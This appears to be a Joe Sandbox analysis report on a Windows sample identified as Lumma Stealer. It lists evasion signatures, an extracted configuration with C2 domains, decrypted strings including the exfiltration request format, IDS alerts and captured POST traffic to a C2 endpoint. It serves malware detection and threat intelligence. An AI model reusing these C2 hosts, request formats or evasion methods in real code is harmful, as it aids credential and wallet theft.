Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1532867
MD5:283f654b01a0041e91613545e4b1b7d1
SHA1:4d397e16c236af966253e076360487b0db03d2fb
SHA256:5f4bbf88da5f3b824e903fa9b2b0458f684ff94157abca983e32c18f7da9f70b
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 283F654B01A0041E91613545E4B1B7D1)
    • WerFault.exe (PID: 5628 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1904 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 6128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6848 -s 1896 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["bathdoomgaz.store", "mobbipenju.store", "clearancek.site", "licendfilteo.site", "eaglepawnoy.store", "spirittunek.store", "studennotediw.store", "dissapoiznw.store"], "Build id": "u4ngr--"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:11.721625+020020546531A Network Trojan was detected192.168.2.449731172.67.206.204443TCP
    2024-10-14T03:57:12.971702+020020546531A Network Trojan was detected192.168.2.449732172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:11.721625+020020498361A Network Trojan was detected192.168.2.449731172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:12.971702+020020498121A Network Trojan was detected192.168.2.449732172.67.206.204443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.602986+020020564771Domain Observed Used for C2 Detected192.168.2.4652561.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.547857+020020564711Domain Observed Used for C2 Detected192.168.2.4607361.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.579914+020020564811Domain Observed Used for C2 Detected192.168.2.4547801.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.567874+020020564831Domain Observed Used for C2 Detected192.168.2.4576411.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.639455+020020564731Domain Observed Used for C2 Detected192.168.2.4546601.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.558059+020020564851Domain Observed Used for C2 Detected192.168.2.4577321.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.626697+020020564751Domain Observed Used for C2 Detected192.168.2.4638261.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:09.589679+020020564791Domain Observed Used for C2 Detected192.168.2.4604351.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-14T03:57:10.919588+020028586661Domain Observed Used for C2 Detected192.168.2.449730104.102.49.254443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus / Scanner detection for submitted sample
    Source: file.exeAvira: detected
    Antivirus detection for URL or domain
    Source: https://steamcommunity.com/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com:443/profiles/76561199724331900URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/inventory/URL Reputation: Label: malware
    Source: https://steamcommunity.com/profiles/76561199724331900/badgesURL Reputation: Label: malware
    Found malware configuration
    Source: file.exe.6848.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["bathdoomgaz.store", "mobbipenju.store", "clearancek.site", "licendfilteo.site", "eaglepawnoy.store", "spirittunek.store", "studennotediw.store", "dissapoiznw.store"], "Build id": "u4ngr--"}
    Multi AV Scanner detection for domain / URL
    Source: sergei-esenin.comVirustotal: Detection: 17%Perma Link
    Source: licendfilteo.siteVirustotal: Detection: 15%Perma Link
    Source: mobbipenju.storeVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: clearancek.siteVirustotal: Detection: 17%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: spirittunek.storeVirustotal: Detection: 21%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: dissapoiznw.storeVirustotal: Detection: 21%Perma Link
    Source: studennotediw.storeVirustotal: Detection: 17%Perma Link
    Source: eaglepawnoy.storeVirustotal: Detection: 18%Perma Link
    Source: https://sergei-esenin.com:443/apiVirustotal: Detection: 18%Perma Link
    Source: https://sergei-esenin.com/kVirustotal: Detection: 8%Perma Link
    Source: bathdoomgaz.storeVirustotal: Detection: 21%Perma Link
    Source: https://dissapoiznw.store:443/apiVirustotal: Detection: 21%Perma Link
    Multi AV Scanner detection for submitted file
    Source: file.exeReversingLabs: Detection: 34%
    Source: file.exeVirustotal: Detection: 43%Perma Link
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Machine Learning detection for sample
    Source: file.exeJoe Sandbox ML: detected
    Sample uses string decryption to hide its real strings
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: licendfilteo.site
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: spirittunek.store
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: bathdoomgaz.store
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: studennotediw.store
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: dissapoiznw.store
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: eaglepawnoy.store
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: mobbipenju.store
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: clearancek.site
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
    Source: 00000000.00000002.1971119639.0000000000341000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.4:49732 version: TLS 1.2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0034D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0034D110
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_003899D0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0034FCA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]0_2_00350EEC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00385700
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00356F91
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h0_2_00383920
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0035D961
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_003449A0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00351A3C
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_00345A50
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h0_2_00384A40
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_003542FC
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then jmp eax0_2_00351ACD
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ebp, eax0_2_0034A300
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh0_2_00389B60
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00353BE2
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00351BEE
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp], 00000000h0_2_0035B410
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+0Ch]0_2_0036C470
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_0035D457
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_00389CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh0_2_00389CE0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h0_2_0036CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_0036CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h0_2_0036CCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_00356536
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh0_2_0036FD10
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00369510
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, word ptr [ebp+00h]0_2_0034BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_00356EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_00346EA0
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esp+40h]0_2_00351E93
    Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]0_2_00356F91

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:57732 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:54780 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:57641 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:65256 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:63826 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:54660 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:60435 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:60736 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 172.67.206.204:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 172.67.206.204:443
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: bathdoomgaz.store
    Source: Malware configuration extractorURLs: mobbipenju.store
    Source: Malware configuration extractorURLs: clearancek.site
    Source: Malware configuration extractorURLs: licendfilteo.site
    Source: Malware configuration extractorURLs: eaglepawnoy.store
    Source: Malware configuration extractorURLs: spirittunek.store
    Source: Malware configuration extractorURLs: studennotediw.store
    Source: Malware configuration extractorURLs: dissapoiznw.store
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewIP Address: 172.67.206.204 172.67.206.204
    Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=HZlidKlpcv_p0sfMpNIO76uVyDFPfvMjvRK5J6.GgLc-1728871031-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: sergei-esenin.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: clearancek.site
    Source: global trafficDNS traffic detected: DNS query: mobbipenju.store
    Source: global trafficDNS traffic detected: DNS query: eaglepawnoy.store
    Source: global trafficDNS traffic detected: DNS query: dissapoiznw.store
    Source: global trafficDNS traffic detected: DNS query: studennotediw.store
    Source: global trafficDNS traffic detected: DNS query: bathdoomgaz.store
    Source: global trafficDNS traffic detected: DNS query: spirittunek.store
    Source: global trafficDNS traffic detected: DNS query: licendfilteo.site
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: sergei-esenin.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sergei-esenin.com
    Source: file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
    Source: file.exe, 00000000.00000003.1808609124.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820309604.0000000000D72000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1972941186.0000000000D73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site/apin
    Source: file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/api=
    Source: file.exe, 00000000.00000002.1972650341.0000000000D3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/apii
    Source: file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akam
    Source: file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steam
    Source: file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/)
    Source: file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/publdq
    Source: file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
    Source: file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
    Source: file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
    Source: file.exe, 00000000.00000003.1820309604.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808609124.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
    Source: file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valMr
    Source: file.exe, 00000000.00000002.1973017733.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1820181604.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
    Source: file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=bz0kMfQA
    Source: file.exe, 00000000.00000002.1972650341.0000000000D35000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1808507756.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
    Source: file.exe, 00000000.00000003.1807710149.0000000000DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
